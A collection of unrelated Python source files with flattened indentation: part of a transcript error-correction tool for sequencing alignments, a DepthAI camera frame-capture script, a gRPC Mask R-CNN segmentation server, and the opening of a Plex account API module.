MVal, newCIGAR = endMatch(MVal, newCIGAR)
newSeq = newSeq + origSeq[seqPos:seqPos + ct]
newCIGAR = newCIGAR + str(ct) + op
seqPos += ct
if op == "S":
# End any ongoing match
MVal, newCIGAR = endMatch(MVal, newCIGAR)
newSeq = newSeq + origSeq[seqPos:seqPos + ct]
newCIGAR = newCIGAR + str(ct) + op
seqPos += ct
# N, H, and D operations are cases where the transcript sequence
# is missing bases that are in the reference genome.
if op in ["N", "H", "D"]:
# End any ongoing match
MVal, newCIGAR = endMatch(MVal, newCIGAR)
genomePos += ct
newCIGAR = newCIGAR + str(ct) + op
# End any ongoing match
MVal, newCIGAR = endMatch(MVal, newCIGAR)
# Update transcript
transcript.CIGAR = newCIGAR
transcript.SEQ = newSeq
return TE_entries
def correctDeletions(transcript, genome, variants, maxLen, logInfo):
""" Corrects deletions up to size maxLen using the reference genome.
If a variant file was provided, correction will be variant-aware."""
logInfo.uncorrected_deletions = 0
logInfo.corrected_deletions = 0
logInfo.variant_deletions = 0
TE_entries = ""
transcript_ID = transcript.QNAME
chrom = transcript.CHROM
origSeq = transcript.SEQ
origCIGAR = transcript.CIGAR
cigarOps,cigarCounts = transcript.splitCIGAR()
# Check for deletions. If none are present, we can skip this transcript
if "D" not in origCIGAR:
return TE_entries
newCIGAR = ""
newSeq = ""
MVal = 0
seqPos = 0
# Start at position in the genome where the transcript starts.
genomePos = transcript.POS
# Iterate over operations to sequence and repair mismatches and microindels
for op,ct in zip(cigarOps, cigarCounts):
currPos = chrom + ":" + str(genomePos) + "-" + \
str(genomePos + ct - 1)
if op == "M":
newSeq = newSeq + origSeq[seqPos:seqPos + ct]
MVal += ct
seqPos += ct
genomePos += ct
if op == "D":
ID = "_".join([chrom, str(genomePos - 1), str(genomePos + ct - 1)])
if ct <= maxLen:
# Check if the deletion is in the optional variant catalog.
if ID in variants:
# The deletion perfectly matches a deletion variant. Leave the deletion in.
currSeq = genome.sequence({'chr': chrom, 'start': genomePos, 'stop': genomePos + ct - 1}, one_based=True)
errorEntry = "\t".join([transcript_ID, ID, "Deletion", str(ct), "Uncorrected", "VariantMatch"])
logInfo.variant_deletions += 1
TE_entries += errorEntry + "\n"
MVal, newCIGAR = endMatch(MVal, newCIGAR)
genomePos += ct
newCIGAR = newCIGAR + str(ct) + op
continue
# Correct deletion if we're not in variant-aware mode
errorEntry = "\t".join([transcript_ID, ID, "Deletion", str(ct), "Corrected", "NA"])
logInfo.corrected_deletions += 1
TE_entries += errorEntry + "\n"
# Add the missing reference bases
refBases = genome.sequence({'chr': chrom, 'start': genomePos, 'stop': genomePos + ct - 1}, one_based=True)
newSeq = newSeq + refBases
genomePos += ct
MVal += ct
# Deletion is too big to fix
else:
errorEntry = "\t".join([transcript_ID, ID, "Deletion", str(ct), "Uncorrected", "TooLarge"])
logInfo.uncorrected_deletions += 1
TE_entries += errorEntry + "\n"
# End any ongoing match
MVal, newCIGAR = endMatch(MVal, newCIGAR)
newCIGAR = newCIGAR + str(ct) + op
genomePos += ct
# S and I operations are cases where the transcript sequence contains bases that are not in the reference genome.
if op in ["S", "I"]:
# End any ongoing match
MVal, newCIGAR = endMatch(MVal, newCIGAR)
newSeq = newSeq + origSeq[seqPos:seqPos + ct]
newCIGAR = newCIGAR + str(ct) + op
seqPos += ct
# N and H operations are cases where the transcript sequence is missing bases that are in the reference genome.
if op in ["N", "H"]:
# End any ongoing match
MVal, newCIGAR = endMatch(MVal, newCIGAR)
genomePos += ct
newCIGAR = newCIGAR + str(ct) + op
# End any ongoing match
MVal, newCIGAR = endMatch(MVal, newCIGAR)
transcript.CIGAR = newCIGAR
transcript.SEQ = newSeq
transcript.NM, transcript.MD = transcript.getNMandMDFlags(genome)
return TE_entries
def correctMismatches(transcript, genome, variants, logInfo):
""" This function corrects mismatches in the provided transcript. If a
variant file was provided, correction will be variant-aware."""
logInfo.uncorrected_mismatches = 0
logInfo.corrected_mismatches = 0
TE_entries = ""
origSeq = transcript.SEQ
origCIGAR = transcript.CIGAR
origMD = transcript.MD
# Check for mismatches. If none are present, we can skip this transcript
if any(i in origMD.upper() for i in 'ACTGN') == False :
return TE_entries
newCIGAR = ""
newSeq = ""
MVal = 0
seqPos = 0
genomePos = transcript.POS
# Merge CIGAR and MD tag information so that we have the locations of all
# insertions, deletions, and mismatches
mergeOperations, mergeCounts = transcript.mergeMDwithCIGAR()
# Iterate over operations to sequence and repair mismatches and microindels
for op,ct in zip(mergeOperations, mergeCounts):
if op == "M":
newSeq = newSeq + origSeq[seqPos:seqPos + ct]
MVal += ct
seqPos += ct
genomePos += ct
# This denotes a mismatch
if op == "X":
# Check if the position matches a variant in the optional variant catalog.
ID = transcript.CHROM + "_" + str(genomePos)
if ID in variants:
# Mismatch position matches a known variant. If the base matches an alternative allele, do not correct it.
currBase = origSeq[seqPos]
if currBase in variants[ID]:
errorEntry = "\t".join([transcript.QNAME, ID, "Mismatch",
str(ct), "Uncorrected",
"VariantMatch"])
TE_entries += errorEntry + "\n"
logInfo.uncorrected_mismatches += 1
# Keep the base as-is
newSeq = newSeq + origSeq[seqPos:seqPos + ct]
MVal += ct
seqPos += ct
genomePos += ct
continue
# Otherwise, correct the mismatch to reference base
errorEntry = "\t".join([transcript.QNAME, ID, "Mismatch",
str(ct), "Corrected", "NA"])
TE_entries += errorEntry + "\n"
logInfo.corrected_mismatches += 1
# Change sequence base to the reference base at this position
newSeq = newSeq + genome.sequence({'chr': transcript.CHROM,
'start': genomePos,
'stop': genomePos + ct - 1},
one_based=True)
seqPos += ct # skip the original sequence base
genomePos += ct # advance the genome position
MVal += ct
if op in ["S", "I"]:
# End any ongoing match
MVal, newCIGAR = endMatch(MVal, newCIGAR)
newSeq = newSeq + origSeq[seqPos:seqPos + ct]
newCIGAR = newCIGAR + str(ct) + op
seqPos += ct
if op in ["N", "H", "D"]:
# End any ongoing match
MVal, newCIGAR = endMatch(MVal, newCIGAR)
genomePos += ct
newCIGAR = newCIGAR + str(ct) + op
# End any ongoing match
MVal, newCIGAR = endMatch(MVal, newCIGAR)
transcript.CIGAR = newCIGAR
transcript.SEQ = newSeq
# TODO: find faster way to compute
transcript.NM, transcript.MD = transcript.getNMandMDFlags(genome)
return TE_entries
def endMatch(MVal, newCIGAR):
""" Function to end an ongoing match during error correction, updating new
CIGAR and MD tag strings as needed. MVal keeps track of how many
matched bases we have at the moment so that when errors are fixed,
adjoining matches can be combined. When an intron or unfixable error
is encountered, it is necessary to end the match by outputting the
current MVal and then setting the variable to zero."""
if MVal > 0:
newCIGAR = newCIGAR + str(MVal) + "M"
MVal = 0
return MVal, newCIGAR
def cleanNoncanonical(transcript, refs, maxDist, logInfo):
""" Iterate over each junction in the provided transcript object. If the
junction is noncanonical, attempt to correct it, and record the result.
Returns a modified transcript object that originates from a copy of the
object passed into the function, along with the error log entries.
"""
logInfo.corrected_NC_SJs = 0
logInfo.uncorrected_NC_SJs = 0
TE_entries = ""
if transcript.isCanonical == True:
return transcript, TE_entries
# Iterate over all junctions and attempt to correct
for splice_jn_num in range(0,len(transcript.spliceJunctions)):
junction = transcript.spliceJunctions[splice_jn_num]
if junction.isCanonical:
continue
else:
temp_transcript = copy(transcript)
ID = "_".join([junction.chrom, str(junction.start), str(junction.end)])
correction_status, reason, dist = attempt_jn_correction(temp_transcript,
splice_jn_num,
refs.genome,
refs.donors,
refs.acceptors,
refs.sjAnnot,
maxDist)
# If there were no problems during correction, replace the original
# transcript with the modified copy.
if correction_status == True:
transcript = temp_transcript
logInfo.corrected_NC_SJs += 1
status = "Corrected"
else:
logInfo.uncorrected_NC_SJs += 1
status = "Uncorrected"
# Update transcript error log
errorEntry = "\t".join([transcript.QNAME, ID, "NC_SJ_boundary",
str(dist), status, reason])
TE_entries += errorEntry + "\n"
return transcript, TE_entries
def find_closest_bound(sj_bound, ref_bounds):
""" Given one side of a splice junction, find the closest reference """
# Create a Bedtool object for the bound
bed_pos = pybedtools.BedTool(sj_bound.getBED(), from_string=True)
# Run Bedtools Closest operation
closest = bed_pos.closest(ref_bounds, s=True, D="ref", t="first", nonamecheck = True)[0]
# Create an object to represent the closest match
# Coordinates are 0-based since they are coming from BED
obj_closest = dstruct.Struct()
obj_closest.chrom = closest[6]
obj_closest.start = int(closest[7])
obj_closest.end = int(closest[8])
obj_closest.dist = int(closest[-1])
return obj_closest
def find_closest_ref_junction(junction, ref_donors, ref_acceptors):
""" Given a splice junction object and a splice reference, locate the
closest junction in the provided splice reference BedTool object"""
# Get the splice donor and acceptor of the junction
donor = junction.get_splice_donor()
acceptor = junction.get_splice_acceptor()
# Find the closest match for each
closest_ref_donor = find_closest_bound(donor, ref_donors)
closest_ref_acceptor = find_closest_bound(acceptor, ref_acceptors)
return closest_ref_donor, closest_ref_acceptor
def update_post_ncsj_correction(transcript, splice_jn_num, genome, sjAnnot):
""" After correcting a noncanonical splice junction, perform the
following updates:
- Reassign the position of the junction (based on its bounds)
- Recompute the splice motif and assign to junction
- Recompute NM/MD tags
- Check canonical and annotated status
"""
junction = transcript.spliceJunctions[splice_jn_num]
junction.recheckPosition()
junction.checkSpliceMotif(genome, sjAnnot)
transcript.NM, transcript.MD = transcript.getNMandMDFlags(genome)
transcript.jM, transcript.jI = transcript.get_jM_jI_tags_from_sjs()
transcript.isCanonical = transcript.recheckCanonical()
transcript.allJnsAnnotated = transcript.recheckJnsAnnotated()
return
def attempt_jn_correction(transcript, splice_jn_num, genome, ref_donors,
ref_acceptors, sjAnnot, maxDist):
""" Given a noncanonical splice junction, try to correct it by locating
a nearby annotated junction within the allowable distance.
Returns:
Corrected (True/False)
Reason for no correction ("NA"/"TooFarFromAnnotJn"/"Other")
CombinedDist
"""
junction = transcript.spliceJunctions[splice_jn_num]
# Find the closest reference junction
ref_donor, ref_acceptor = find_closest_ref_junction(junction, ref_donors,
ref_acceptors)
# Compute the overall distance of the original junction from the reference
combined_dist = combinedJunctionDist(ref_donor.dist, ref_acceptor.dist)
# Only attempt to rescue junction boundaries that are within maxDist bp of
# an annotated junction
if combined_dist > maxDist or abs(ref_donor.dist) > 2*maxDist or \
abs(ref_acceptor.dist) > 2*maxDist:
return False, "TooFarFromAnnotJn", combined_dist
try:
# Attempt to fix the splice donor side
donor = junction.get_splice_donor()
transcript.SEQ, transcript.CIGAR = fix_one_side_of_junction(transcript.CHROM,
transcript.POS, splice_jn_num,
donor, ref_donor.dist, genome,
transcript.SEQ, transcript.CIGAR)
# Attempt to fix the splice acceptor side
acceptor = junction.get_splice_acceptor()
transcript.SEQ, transcript.CIGAR = fix_one_side_of_junction(transcript.CHROM,
transcript.POS, splice_jn_num,
acceptor, ref_acceptor.dist, genome,
transcript.SEQ, transcript.CIGAR)
# Now, perform updates:
update_post_ncsj_correction(transcript, splice_jn_num, genome, sjAnnot)
except Exception as e:
return False, "Other", combined_dist
return True, "NA", combined_dist
def combinedJunctionDist(dist_0, dist_1):
"""Computes the combined genomic distance of two splice junction ends
from the closest annotated junctions. In essence, it is finding the
size indel that could have created the discrepancy between the
reference and transcript junctions.
Examples ('|' character respresents end of exon):
Reference: ----->| |<-----
Transcript: ----->| |<-----
dist_0 = -2, dist_1 = +2, combined dist = 4
Reference: ----->| |<-----
Transcript: ----->| |<-----
dist_0 = 0, dist_1 = +2, combined dist = 2
Reference: ----->| |<-----
Transcript: ----->| |<-----
dist_0 = +1, dist_1 = +4, combined dist = 3
"""
# If dist_0 and dist_1 have different signs, the combined distance is
# the sum of their absolute values
if dist_0*dist_1 <= 0:
combined_dist = abs(dist_0) + abs(dist_1)
else:
combined_dist = abs(abs(dist_0) - abs(dist_1))
return combined_dist
def group_CIGAR_by_exon_and_intron(CIGAR, seq):
""" Given a CIGAR string, group all of the operations by exon or intron,
resulting in one string per exon/intron. Also, subdivide the provided
sequence by exon as well."""
# Inits
currExonStr = ""
currExonCIGAR = ""
currSeqIndex = 0
operations, counts = splitCIGAR(CIGAR)
# Outputs
exonSeqs = []
exonCIGARs = []
intronCIGARs = []
for op, ct in zip(operations, counts):
if op == "N":
exonSeqs.append(currExonStr)
intronCIGARs.append(ct)
exonCIGARs.append(currExonCIGAR)
currExonStr = ""
currExonCIGAR = ""
elif op in [ "M", "S", "I"]:
currExonStr = currExonStr + str(seq[currSeqIndex:currSeqIndex+ct])
currExonCIGAR = currExonCIGAR + str(ct) + op
currSeqIndex += ct
else:
currExonCIGAR = currExonCIGAR + str(ct) + op
# Append last exon entries
exonSeqs.append(currExonStr)
exonCIGARs.append(currExonCIGAR)
return exonCIGARs, intronCIGARs, exonSeqs
def fix_one_side_of_junction(chrom, transcript_start, jn_number, intronBound, d,
genome, seq, oldCIGAR):
""" Corrects one side of a noncanonical splice junction by the specified
number of bases. This involves modifying the sequence and CIGAR string.
Returns modified CIGAR string and sequence
"""
# If d = 0, then the bound already matches the annotation.
if d == 0:
return seq, oldCIGAR
# First, split CIGAR by exon/intron, as well as the sequence
exonCIGARs, intronCIGARs, exonSeqs = group_CIGAR_by_exon_and_intron(oldCIGAR, seq)
# Now go and fix the specific splice junction piece
if intronBound.bound == 0:
targetExon = jn_number
exon = exonSeqs[targetExon]
if d > 0: # Need to add d bases from reference to end of exon. Case 1.
# For CIGAR string,
exonEnd = intronBound.pos - 1
seqIndex = exonEnd - transcript_start + 1
refAdd = genome.sequence({'chr': chrom, 'start': exonEnd + 1, 'stop': exonEnd + d}, one_based=True)
exonSeqs[targetExon] = exon + refAdd
intronBound.pos += d
if d < 0: # Need to subtract from end of exon sequence. Case 3
exonSeqs[targetExon] = exon[0:d]
intronBound.pos += d
intronCIGARs[jn_number] -= d
exonCIGARs[targetExon] = editExonCIGAR(exonCIGARs[targetExon], -1, d)
else:
targetExon = jn_number + 1
exon = exonSeqs[targetExon]
if d < 0: # Need to add d bases from reference to start of exon sequence. Case 2.
exonStart = intronBound.pos + 1
seqIndex = exonStart - transcript_start + 1
refAdd = genome.sequence({'chr': chrom, 'start': exonStart - abs(d), 'stop': exonStart - 1}, one_based=True)
exonSeqs[targetExon] = refAdd + exon
intronBound.pos += d
if d > 0: # Need to subtract from start of exon sequence. Case 4
exonSeqs[targetExon] = exon[d:]
intronBound.pos += d
# Modify exon string
exonCIGARs[targetExon] = editExonCIGAR(exonCIGARs[targetExon], 0, -d)
intronCIGARs[jn_number] += d
newSeq = str(''.join(exonSeqs))
# Paste together the new CIGAR string
newCIGAR = ""
for i in range(0,len(intronCIGARs)):
newCIGAR = newCIGAR + exonCIGARs[i] + str(intronCIGARs[i]) + "N"
newCIGAR = newCIGAR + exonCIGARs[-1]
if not check_seq_and_cigar_length(newSeq, newCIGAR):
raise RuntimeError("CIGAR string and sequence are not the same length")
return newSeq, newCIGAR
def check_CIGAR_validity(CIGAR):
""" Returns 'True' if CIGAR string passes tests, and "False" otherwise.
Checks to make sure that
1) Introns (N) are only ever followed by M operation
2) Introns never follow an insertion/deletion
"""
if "-" in CIGAR:
return False
operations, counts = splitCIGAR(CIGAR)
prev = ""
for op, ct in zip(operations, counts):
if prev == "N" and op != "M":
return False
if prev == "D" and op == "N":
return False
prev = op
return True
def splitCIGAR(CIGAR):
""" Takes CIGAR string from SAM and splits it into two lists: one with
capital letters (match operators), and one with the number of bases """
matchTypes = re.sub('[0-9]', " ", CIGAR).split()
matchCounts = re.sub('[A-Z]', " ", CIGAR).split()
matchCounts = [int(i) for i in matchCounts]
return matchTypes, matchCounts
def editExonCIGAR(exon, side, nBases):
""" Given an exon CIGAR string, this function adds or subtracts bases from
the start (side = 0) or end (side = -1)"""
operations, counts = splitCIGAR(exon)
if side == -1:
operations = operations[::-1]
counts = counts[::-1]
# If nBases > 0, we have an easy case. Just add the bases.
if nBases >= 0:
if operations[0] == "M":
counts[0] = counts[0] + nBases
else:
counts = [nBases] + counts
operations = ["M"] + operations
# If nBases < 0, we need to make sure we have room to delete the bases
else:
for i in range(0,len(counts)):
ct = counts[i]
remainder = ct - abs(nBases)
if remainder > 0:
counts[i] = remainder
break
elif remainder == 0:
counts[i] = ""
operations[i] = ""
break
else:
counts[i] = ""
operations[i] = ""
nBases = remainder
if side == -1:
operations = operations[::-1]
counts = counts[::-1]
result = ""
for op, ct in zip(operations, counts):
result = result + str(ct) + op
return result
def init_log_info(sam_fields):
""" Initialize a log_info struct to track the error types and correction
status for a single transcript """
transcript_id = sam_fields[0]
flag = int(sam_fields[1])
chrom = sam_fields[2]
logInfo = dstruct.Struct()
logInfo.TranscriptID = transcript_id
# Check if read is unmapped, uniquely mapped, or multimapped
if chrom == "*" or flag == 4:
logInfo.Mapping = "unmapped"
elif flag > 16:
logInfo.Mapping = "non-primary"
else:
logInfo.Mapping = "primary"
logInfo.corrected_deletions = "NA"
logInfo.uncorrected_deletions = "NA"
logInfo.variant_deletions = "NA"
logInfo.corrected_insertions = "NA"
logInfo.uncorrected_insertions = "NA"
logInfo.variant_insertions = "NA"
logInfo.corrected_mismatches = "NA"
logInfo.uncorrected_mismatches = "NA"
logInfo.corrected_NC_SJs = "NA"
logInfo.uncorrected_NC_SJs = "NA"
return logInfo
def create_log_string(logInfo):
""" Create string version of logInfo struct """
log_strings = [ str(x) for x in [logInfo.TranscriptID, logInfo.Mapping,
logInfo.corrected_deletions,
logInfo.uncorrected_deletions,
logInfo.variant_deletions,
logInfo.corrected_insertions,
logInfo.uncorrected_insertions,
logInfo.variant_insertions,
logInfo.corrected_mismatches,
logInfo.uncorrected_mismatches,
logInfo.corrected_NC_SJs,
logInfo.uncorrected_NC_SJs] ]
return "\t".join(log_strings)
def write_to_transcript_log(logInfo, tL):
""" Write a transcript log entry to output """
log_str = create_log_string(logInfo)
tL.write(log_str + "\n")
return
def dryRun(sam, options, outfiles):
"""Records all mismatches, insertions, and deletions in the transcripts,
but does not correct them """
print("Dry run mode: Identifying indels and mismatches.........")
tL = outfiles.log
eL = outfiles.TElog
genome = Fasta(options.refGenome)
sjAnnot = set()
for line in sam:
# Set up log entry for transcript
transcript, logInfo = transcript_init(line, genome, sjAnnot)
if transcript == None:
write_to_transcript_log(logInfo, tL)
continue
# For primary alignments, modify logInfo
logInfo.uncorrected_deletions = 0
logInfo.uncorrected_insertions = 0
logInfo.uncorrected_mismatches = 0
# Iterate over CIGAR to catalogue indels and mismatches
seqPos = 0
genomePos = transcript.POS
mergeOperations, mergeCounts = transcript.mergeMDwithCIGAR()
for op,ct in zip(mergeOperations, mergeCounts):
if op == "M":
seqPos += ct
genomePos += ct
if op == "X":
ID = "_".join([transcript.CHROM, str(genomePos)])
eL.write("\t".join([transcript.QNAME, ID, "Mismatch",
str(ct), "Uncorrected", "DryRun"]) + "\n")
logInfo.uncorrected_mismatches += 1
seqPos += ct
genomePos += ct
if op == "D":
ID = "_".join([transcript.CHROM, str(genomePos - 1),
str(genomePos + ct - 1)])
eL.write("\t".join([transcript.QNAME, ID, "Deletion",
str(ct), "Uncorrected", "DryRun"]) + "\n")
logInfo.uncorrected_deletions += 1
genomePos += ct
if op == "I":
ID = "_".join([transcript.CHROM, str(genomePos - 1),
str(genomePos + ct - 1)])
eL.write("\t".join([transcript.QNAME, ID, "Insertion",
str(ct), "Uncorrected", "DryRun"]) + "\n")
logInfo.uncorrected_insertions += 1
seqPos += ct
if op == "S":
seqPos += ct
if op in ["N", "H"]:
genomePos += ct
write_to_transcript_log(logInfo, tL)
return
if __name__ == '__main__':
#pr = cProfile.Profile()
#pr.enable()
main()
#pr.disable()
#pr.print_stats(sort='cumtime')
|
main.py
|
#!/usr/bin/env python3
import argparse
from pathlib import Path
from time import monotonic
from uuid import uuid4
from multiprocessing import Process, Queue
import cv2
import depthai as dai
def check_range(min_val, max_val):
def check_fn(value):
ivalue = int(value)
if min_val <= ivalue <= max_val:
return ivalue
else:
raise argparse.ArgumentTypeError(
"{} is an invalid int value, must be in range {}..{}".format(value, min_val, max_val)
)
return check_fn
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--threshold', default=0.3, type=float, help="Maximum difference between packet timestamps to be considered as synced")
parser.add_argument('-p', '--path', default="data", type=str, help="Path where to store the captured data")
parser.add_argument('-d', '--dirty', action='store_true', default=False, help="Allow the destination path not to be empty")
parser.add_argument('-nd', '--no-debug', dest="prod", action='store_true', default=False, help="Do not display debug output")
parser.add_argument('-m', '--time', type=float, default=float("inf"), help="Finish execution after X seconds")
parser.add_argument('-af', '--autofocus', type=str, default=None, help="Set AutoFocus mode of the RGB camera", choices=list(filter(lambda name: name[0].isupper(), vars(dai.CameraControl.AutoFocusMode))))
parser.add_argument('-mf', '--manualfocus', type=check_range(0, 255), help="Set manual focus of the RGB camera [0..255]")
parser.add_argument('-et', '--exposure-time', type=check_range(1, 33000), help="Set manual exposure time of the RGB camera [1..33000]")
parser.add_argument('-ei', '--exposure-iso', type=check_range(100, 1600), help="Set manual exposure ISO of the RGB camera [100..1600]")
args = parser.parse_args()
exposure = [args.exposure_time, args.exposure_iso]
if any(exposure) and not all(exposure):
raise RuntimeError("Both --exposure-time and --exposure-iso needs to be provided")
dest = Path(args.path).resolve().absolute()
dest_count = len(list(dest.glob('*')))
if dest.exists() and dest_count != 0 and not args.dirty:
raise ValueError(f"Path {dest} contains {dest_count} files. Either specify new path or use \"--dirty\" flag to use current one")
dest.mkdir(parents=True, exist_ok=True)
def create_pipeline(depth_enabled=True):
pipeline = dai.Pipeline()
rgb = pipeline.createColorCamera()
rgb.setPreviewSize(300, 300)
rgb.setBoardSocket(dai.CameraBoardSocket.RGB)
rgb.setResolution(dai.ColorCameraProperties.SensorResolution.THE_1080_P)
rgb.setInterleaved(False)
rgb.setColorOrder(dai.ColorCameraProperties.ColorOrder.RGB)
controlIn = pipeline.createXLinkIn()
controlIn.setStreamName('control')
controlIn.out.link(rgb.inputControl)
rgbOut = pipeline.createXLinkOut()
rgbOut.setStreamName("color")
rgb.preview.link(rgbOut.input)
if depth_enabled:
left = pipeline.createMonoCamera()
left.setResolution(dai.MonoCameraProperties.SensorResolution.THE_400_P)
left.setBoardSocket(dai.CameraBoardSocket.LEFT)
right = pipeline.createMonoCamera()
right.setResolution(dai.MonoCameraProperties.SensorResolution.THE_400_P)
right.setBoardSocket(dai.CameraBoardSocket.RIGHT)
depth = pipeline.createStereoDepth()
depth.initialConfig.setConfidenceThreshold(255)
median = dai.StereoDepthProperties.MedianFilter.KERNEL_7x7
depth.initialConfig.setMedianFilter(median)
depth.setLeftRightCheck(False)
depth.setExtendedDisparity(False)
depth.setSubpixel(False)
left.out.link(depth.left)
right.out.link(depth.right)
# Create output
leftOut = pipeline.createXLinkOut()
leftOut.setStreamName("left")
left.out.link(leftOut.input)
rightOut = pipeline.createXLinkOut()
rightOut.setStreamName("right")
right.out.link(rightOut.input)
depthOut = pipeline.createXLinkOut()
depthOut.setStreamName("disparity")
depth.disparity.link(depthOut.input)
return pipeline
# https://stackoverflow.com/a/7859208/5494277
def step_norm(value):
return round(value / args.threshold) * args.threshold
def seq(packet):
return packet.getSequenceNum()
def tst(packet):
return packet.getTimestamp().total_seconds()
# https://stackoverflow.com/a/10995203/5494277
def has_keys(obj, keys):
return all(stream in obj for stream in keys)
class PairingSystem:
seq_streams = ["left", "right", "disparity"]
ts_streams = ["color"]
seq_ts_mapping_stream = "left"
def __init__(self):
self.ts_packets = {}
self.seq_packets = {}
self.last_paired_ts = None
self.last_paired_seq = None
def add_packets(self, packets, stream_name):
if packets is None:
return
if stream_name in self.seq_streams:
for packet in packets:
seq_key = seq(packet)
self.seq_packets[seq_key] = {
**self.seq_packets.get(seq_key, {}),
stream_name: packet
}
elif stream_name in self.ts_streams:
for packet in packets:
ts_key = step_norm(tst(packet))
self.ts_packets[ts_key] = {
**self.ts_packets.get(ts_key, {}),
stream_name: packet
}
def get_pairs(self):
results = []
for key in list(self.seq_packets.keys()):
if has_keys(self.seq_packets[key], self.seq_streams):
ts_key = step_norm(tst(self.seq_packets[key][self.seq_ts_mapping_stream]))
if ts_key in self.ts_packets and has_keys(self.ts_packets[ts_key], self.ts_streams):
results.append({
**self.seq_packets[key],
**self.ts_packets[ts_key]
})
self.last_paired_seq = key
self.last_paired_ts = ts_key
if len(results) > 0:
self.collect_garbage()
return results
def collect_garbage(self):
for key in list(self.seq_packets.keys()):
if key <= self.last_paired_seq:
del self.seq_packets[key]
for key in list(self.ts_packets.keys()):
if key <= self.last_paired_ts:
del self.ts_packets[key]
extract_frame = {
"left": lambda item: item.getCvFrame(),
"right": lambda item: item.getCvFrame(),
"color": lambda item: item.getCvFrame(),
"disparity": lambda item: cv2.applyColorMap(item.getFrame(), cv2.COLORMAP_JET),
}
frame_q = Queue()
def store_frames(in_q):
while True:
frames_dict = in_q.get()
if frames_dict is None:
return
frames_path = dest / Path(str(uuid4()))
frames_path.mkdir(parents=False, exist_ok=False)
for stream_name, item in frames_dict.items():
cv2.imwrite(str(frames_path / Path(f"{stream_name}.png")), item)
store_p = Process(target=store_frames, args=(frame_q, ))
store_p.start()
# Pipeline defined, now the device is connected to
try:
with dai.Device() as device:
cams = device.getConnectedCameras()
depth_enabled = dai.CameraBoardSocket.LEFT in cams and dai.CameraBoardSocket.RIGHT in cams
ps = None
if depth_enabled:
ps = PairingSystem()
else:
PairingSystem.seq_streams = []
device.startPipeline(create_pipeline(depth_enabled))
qControl = device.getInputQueue('control')
ctrl = dai.CameraControl()
if args.autofocus:
ctrl.setAutoFocusMode(getattr(dai.CameraControl.AutoFocusMode, args.autofocus))
if args.manualfocus:
ctrl.setManualFocus(args.manualfocus)
if all(exposure):
ctrl.setManualExposure(*exposure)
qControl.send(ctrl)
cfg = dai.ImageManipConfig()
start_ts = monotonic()
while True:
for queueName in PairingSystem.seq_streams + PairingSystem.ts_streams:
packets = device.getOutputQueue(queueName).tryGetAll()
if ps is not None:
ps.add_packets(packets, queueName)
elif queueName == "color":
for packet in packets:
frame_q.put({"color": extract_frame[queueName](packet)})
if queueName == "color" and len(packets) > 0 and not args.prod:
cv2.imshow("preview", packets[-1].getCvFrame())
if ps is not None:
pairs = ps.get_pairs()
for pair in pairs:
extracted_pair = {stream_name: extract_frame[stream_name](item) for stream_name, item in pair.items()}
if not args.prod:
for stream_name, item in extracted_pair.items():
cv2.imshow(stream_name, item)
frame_q.put(extracted_pair)
if not args.prod and cv2.waitKey(1) == ord('q'):
break
if monotonic() - start_ts > args.time:
break
finally:
frame_q.put(None)
store_p.join()
|
mask_rcnn_server.py
|
import sys
import logging
import io
import grpc
import argparse
import os.path
import time
import concurrent.futures
import multiprocessing as mp
import skimage.io
from services import registry
import services.common
import services.service_spec.segmentation_pb2 as ss_pb
import services.service_spec.segmentation_pb2_grpc as ss_grpc
logging.basicConfig(level=10, format="%(asctime)s - [%(levelname)8s] - %(name)s - %(message)s")
log = logging.getLogger(__package__ + "." + __name__)
class SegmentationServicer(ss_grpc.SemanticSegmentationServicer):
def __init__(self, q):
self.q = q
pass
def segment(self, request, context):
# Marshal input
image = request.img.content
mimetype = request.img.mimetype
img_data = io.BytesIO(image)
img = skimage.io.imread(img_data)
# Drop alpha channel if it exists
if img.shape[-1] == 4:
img = img[:, :, :3]
log.debug("Dropping alpha channel from image")
self.q.send((img,))
result = self.q.recv()
if isinstance(result, Exception):
raise result
# Marshal output
pb_result = ss_pb.Result(
segmentation_img=[ss_pb.Image(content=i) for i in result["masks"]],
debug_img=ss_pb.Image(content=result["resultImage"]),
class_ids=[class_id for class_id in result["class_ids"]],
class_names=[n for n in result["class_names"]],
scores=[n for n in result["scores"]]
# known_classes=[n for n in result["known_classes"]],
)
return pb_result
def serve(dispatch_queue, max_workers=1, port=7777):
assert max_workers == 1, "No support for more than one worker"
server = grpc.server(concurrent.futures.ThreadPoolExecutor(max_workers=max_workers))
ss_grpc.add_SemanticSegmentationServicer_to_server(SegmentationServicer(dispatch_queue), server)
server.add_insecure_port("[::]:{}".format(port))
return server
def main_loop(dispatch_queue, grpc_serve_function, grpc_port, grpc_args=None):
if grpc_args is None:
grpc_args = dict()
server = None
if grpc_serve_function is not None:
server = grpc_serve_function(dispatch_queue, port=grpc_port, **grpc_args)
server.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
server.stop(0)
def worker(q):
while True:
try:
item = q.recv()
with mp.Pool(1) as p:
result = p.apply(services.common.segment_image, (item[0], True))
q.send(result)
except Exception as e:
q.send(e)
def main():
script_name = __file__
parser = argparse.ArgumentParser(prog=script_name)
server_name = os.path.splitext(os.path.basename(script_name))[0]
parser.add_argument("--grpc-port",
help="port to bind grpc services to",
default=registry[server_name]['grpc'],
type=int,
required=False)
args = parser.parse_args(sys.argv[1:])
# Need queue system and spawning grpc server in separate process because of:
# https://github.com/grpc/grpc/issues/16001
pipe = mp.Pipe()
p = mp.Process(target=main_loop, args=(pipe[0], serve, args.grpc_port))
p.start()
w = mp.Process(target=worker, args=(pipe[1],))
w.start()
p.join()
w.join()
if __name__ == "__main__":
main()
|
myplex.py
|
# -*- coding: utf-8 -*-
import copy
import threading
import time
from xml.etree import ElementTree
import requests
from plexapi import (BASE_HEADERS, CONFIG, TIMEOUT, X_PLEX_ENABLE_FAST_CONNECT,
X_PLEX_IDENTIFIER, log, logfilter, utils)
from plexapi.base import PlexObject
from plexapi.client import PlexClient
from plexapi.exceptions import BadRequest, NotFound, Unauthorized
from plexapi.library import LibrarySection
from plexapi.server import PlexServer
from plexapi.sonos import PlexSonosClient
from plexapi.sync import SyncItem, SyncList
from plexapi.utils import joinArgs
from requests.status_codes import _codes as codes
class MyPlexAccount(PlexObject):
""" MyPlex account and profile information. This object represents the data found Account on
the myplex.tv servers at the url https://plex.tv/users/account. You may create this object
directly by passing in your username & password (or token). There is also a convenience
method provided at :class:`~plexapi.server.PlexServer.myPlexAccount()` which will create
and return this object.
Parameters:
username (str): Your MyPlex username.
password (str): Your MyPlex password.
